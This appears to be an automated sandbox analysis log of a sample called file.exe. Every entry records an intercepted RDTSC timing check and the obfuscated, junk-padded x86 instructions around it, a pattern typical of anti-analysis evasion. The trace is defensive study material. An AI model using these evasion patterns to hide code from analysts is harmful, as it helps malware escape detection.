Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EE53D second address: 11EE55A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCC24F8725Ah 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jbe 00007FCC24F87256h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EE55A second address: 11EE55E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EEB3D second address: 11EEB99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FCC24F8725Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 jp 00007FCC24F87256h 0x00000016 jl 00007FCC24F87256h 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f je 00007FCC24F87262h 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 je 00007FCC24F87256h 0x0000002f push ebx 0x00000030 pop ebx 0x00000031 jc 00007FCC24F87256h 0x00000037 popad 0x00000038 jbe 00007FCC24F8725Eh 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EF42A second address: 11EF42F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EF698 second address: 11EF6BA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FCC24F8725Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jc 00007FCC24F87256h 0x00000014 pop edx 0x00000015 pushad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EF6BA second address: 11EF6C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EF6C0 second address: 11EF6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FCC24F87269h 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCC24F87263h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EF6F7 second address: 11EF6FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EF983 second address: 11EF988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EF988 second address: 11EF999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FCC24D21136h 0x00000009 jnl 00007FCC24D21136h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EF999 second address: 11EF9A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EF9A2 second address: 11EF9C3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCC24D21136h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FCC24D2113Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EF9C3 second address: 11EF9DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCC24F87266h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EF9DD second address: 11EF9EC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jne 00007FCC24D21136h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F020F second address: 11F0215 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F0215 second address: 11F0229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCC24D21140h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F5F93 second address: 11F5FBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FCC24F87266h 0x0000000c js 00007FCC24F87256h 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F5FBA second address: 11F5FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FCC24D21138h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F5FD1 second address: 11F5FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007FCC24F8725Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FA024 second address: 11FA039 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24D21140h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FA039 second address: 11FA05F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FCC24F87264h 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 jno 00007FCC24F87256h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FA05F second address: 11FA063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FA063 second address: 11FA073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FCC24F87256h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11FA073 second address: 11FA079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F90AE second address: 11F90C8 instructions: 0x00000000 rdtsc 0x00000002 je 00007FCC24F8725Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c js 00007FCC24F87262h 0x00000012 jno 00007FCC24F87256h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F920C second address: 11F9212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F94C0 second address: 11F9508 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FCC24F87269h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FCC24F87261h 0x00000011 jmp 00007FCC24F8725Bh 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 popad 0x00000019 push ecx 0x0000001a jc 00007FCC24F8725Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F9654 second address: 11F9658 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F9658 second address: 11F9660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F9660 second address: 11F966C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007FCC24D21136h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F97FA second address: 11F9804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FCC24F87256h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F9AFB second address: 11F9AFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F9AFF second address: 11F9B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FCC24F87256h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F9B0F second address: 11F9B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F9B13 second address: 11F9B27 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCC24F87256h 0x00000008 jl 00007FCC24F87256h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F9B27 second address: 11F9B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F9B2D second address: 11F9B31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F9B31 second address: 11F9B35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120324E second address: 1203264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007FCC24F8725Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1203264 second address: 120326E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1201198 second address: 120119C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120119C second address: 12011C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007FCC24D21136h 0x0000000d jmp 00007FCC24D2113Bh 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FCC24D2113Bh 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12011C6 second address: 12011CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12017C8 second address: 12017D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12017D4 second address: 12017D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1201ABD second address: 1201AC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1201AC3 second address: 1201AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FCC24F87256h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1201C6C second address: 1201C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1201C72 second address: 1201C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FCC24F87266h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1201C92 second address: 1201C98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1201C98 second address: 1201CDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jo 00007FCC24F87256h 0x0000000c jmp 00007FCC24F8725Dh 0x00000011 jmp 00007FCC24F87267h 0x00000016 jmp 00007FCC24F8725Bh 0x0000001b popad 0x0000001c pushad 0x0000001d jng 00007FCC24F87256h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1201CDD second address: 1201CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1201CEA second address: 1201CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1201FAB second address: 1201FB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1201FB3 second address: 1202004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCC24F87261h 0x0000000d jc 00007FCC24F87288h 0x00000013 jmp 00007FCC24F87269h 0x00000018 jmp 00007FCC24F87269h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1202004 second address: 1202018 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCC24D21146h 0x00000008 jmp 00007FCC24D2113Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120214C second address: 1202173 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCC24F87265h 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jne 00007FCC24F87256h 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1202173 second address: 1202178 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1202178 second address: 120219C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FCC24F87269h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12030EE second address: 12030F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1209B5D second address: 1209B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1209E48 second address: 1209E52 instructions: 0x00000000 rdtsc 0x00000002 js 00007FCC24D2113Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1209E52 second address: 1209E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FCC24F8725Ah 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FCC24F87260h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1209E77 second address: 1209E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1209E7B second address: 1209E7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120D582 second address: 120D58C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120D3F3 second address: 120D403 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FCC24F87256h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121B9EB second address: 121B9F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121B9F4 second address: 121B9FA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121B9FA second address: 121BA05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121ED20 second address: 121ED46 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FCC24F8725Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FCC24F8725Ah 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 pop eax 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121ED46 second address: 121ED4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122D7B5 second address: 122D7BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122D5F0 second address: 122D60F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FCC24D21146h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122D60F second address: 122D614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122D614 second address: 122D61D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122D61D second address: 122D62C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FCC24F87256h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122D62C second address: 122D648 instructions: 0x00000000 rdtsc 0x00000002 je 00007FCC24D21136h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007FCC24D21138h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122D648 second address: 122D64E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122D64E second address: 122D652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122D652 second address: 122D656 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 122D656 second address: 122D65C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1235DE6 second address: 1235DEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1235DEA second address: 1235DF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1235DF3 second address: 1235E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jns 00007FCC24F87266h 0x0000000b jp 00007FCC24F8725Ch 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FCC24F87269h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1235E36 second address: 1235E3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1236297 second address: 123629B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123652E second address: 1236559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FCC24D2113Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCC24D21148h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1236559 second address: 123655D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123655D second address: 1236561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1236561 second address: 1236583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FCC24F87269h 0x0000000f jmp 00007FCC24F87263h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123674A second address: 1236764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCC24D21146h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1236764 second address: 1236768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1237195 second address: 1237199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1237199 second address: 123719D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123719D second address: 12371A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123C75D second address: 123C775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FCC24F87261h 0x0000000c rdtsc
